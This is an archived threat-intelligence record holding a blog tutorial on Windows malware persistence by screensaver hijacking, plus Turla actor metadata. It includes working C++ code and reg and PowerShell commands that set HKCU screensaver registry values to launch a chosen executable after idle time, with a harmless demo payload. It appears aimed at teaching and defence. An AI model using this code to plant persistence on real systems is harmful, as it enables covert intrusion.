{
	"id": "83074e6a-8b69-4a8e-bb98-5058b29cf81f",
	"created_at": "2026-04-06T01:30:45.185065Z",
	"updated_at": "2026-04-10T03:33:35.777455Z",
	"deleted_at": null,
	"sha1_hash": "4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8",
	"title": "Malware development: persistence - part 2. Screensaver hijack. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1165902,
	"plain_text": "Malware development: persistence - part 2. Screensaver hijack.\r\nC++ example.\r\nBy cocomelonc\r\nPublished: 2022-04-26 · Archived: 2026-04-06 00:58:57 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the second part of a series of articles on Windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into another persistence trick: abusing screensavers.\r\nscreensavers\r\nScreensavers are programs that execute after a configurable period of user inactivity. This Windows feature is known to be abused by threat actors as a persistence method. Screensavers are PE files with a .scr extension by default, and their settings are stored in the following registry values:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 1 of 8\r\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\ScreenSaveActive - set to 1 to enable the screensaver.\r\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\ScreenSaveTimeOut - sets the user inactivity timeout (in seconds) before the screensaver is executed.\r\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE - sets the path of the app to run.\r\npractical example\r\nLet’s look at a practical example. Let’s say we have the “malware” from the previous part, hack.cpp:\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBoxA(NULL, \"Meow-meow!\",\"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -mwindows -I/usr/share/mingw-w64/include/ -s -ffunction-section\r\nAnd save it to the folder Z:\\2022-04-26-malware-pers-2\\:\r\nThen let’s create a program pers.cpp that sets the registry values so that our hack.exe is executed once the user has been inactive for 10 seconds:\r\n/*\r\npers.cpp\r\nwindows low level persistence via screensaver\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\n// returns TRUE if the string value regVal under hKeyRoot\\lpSubKey equals compare\r\nint reg_key_compare(HKEY hKeyRoot, char* lpSubKey, char* regVal, char* compare) {\r\n HKEY hKey = nullptr;\r\n LONG ret;\r\n char value[1024];\r\n DWORD size = sizeof(value);\r\n ret = RegOpenKeyExA(hKeyRoot, lpSubKey, 0, KEY_READ, \u0026hKey);\r\n if (ret == ERROR_SUCCESS) {\r\n ret = RegQueryValueExA(hKey, regVal, NULL, NULL, (LPBYTE)value, \u0026size);\r\n RegCloseKey(hKey);\r\n if (ret == ERROR_SUCCESS) {\r\n if (strcmp(value, compare) == 0) {\r\n return TRUE;\r\n }\r\n }\r\n }\r\n return FALSE;\r\n}\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // malicious app\r\n const char* exe = \"Z:\\\\2022-04-26-malware-pers-2\\\\hack.exe\";\r\n // timeout\r\n const char* ts = \"10\";\r\n // activation\r\n const char* aact = \"1\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)\"Control Panel\\\\Desktop\", 0 , KEY_WRITE, \u0026hkey);\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry values (the size includes the terminating NUL, as REG_SZ requires)\r\n RegSetValueEx(hkey, (LPCSTR)\"ScreenSaveActive\", 0, REG_SZ, (unsigned char*)aact, strlen(aact) + 1);\r\n RegSetValueEx(hkey, (LPCSTR)\"ScreenSaveTimeOut\", 0, REG_SZ, (unsigned char*)ts, strlen(ts) + 1);\r\n RegSetValueEx(hkey, (LPCSTR)\"SCRNSAVE.EXE\", 0, REG_SZ, (unsigned char*)exe, strlen(exe) + 1);\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAs you can see, the logic is as simple as it gets: we just set the registry values for the timeout and the app path. The same values can be added from the cmd terminal:\r\nreg add \"HKCU\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /d 10\r\nreg add \"HKCU\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /d Z:\\2022-04-26-malware-pers-2\\hack.exe\r\nor with PowerShell commands:\r\nNew-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop\\' -Name 'ScreenSaveTimeOut' -Value '10'\r\nNew-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop\\' -Name 'SCRNSAVE.EXE' -Value 'Z:\\2022-04-26-malware-pers-2\\\r\nbut since I love writing code, I wanted to show how to do it with a few lines of code.\r\ndemo\r\nLet’s compile our pers.cpp program:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, for the purity of the experiment, first check the registry values on the victim’s machine and delete them if they exist:\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'ScreenSaveTimeOut'\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'SCRNSAVE.EXE'\r\nThen run our pers.exe and check again:\r\n.\\pers.exe\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nAs you can see, the new values were added as expected.\r\nNow let’s check everything in action. Log out and log in again and wait 10 seconds, or just stay inactive for 10 seconds:\r\nPwn! Everything worked perfectly :)\r\nAfter the experiment, delete the values:\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'ScreenSaveTimeOut'\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'SCRNSAVE.EXE'\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nconclusion\r\nThe problem with this persistence trick is that the screensaver session is terminated when the user comes back and the system is no longer idle. However, red teams can perform their operations (something like a coin miner) during the user’s absence. If screensavers are disabled by group policy, this method cannot be used for persistence. Defenders can also block .scr files from being executed from non-standard locations.\r\nThis trick has been used in the wild by the Gazer malware and the Turla APT.\r\nThis trick in MITRE ATT\u0026CK\r\nGazer\r\nTurla\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nRegCloseKey\r\nRemove-ItemProperty\r\nreg query\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html"
	],
	"report_names": [
		"malware-pers-2.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439045,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.pdf",
		"text": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.txt",
		"img": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.jpg"
	}
}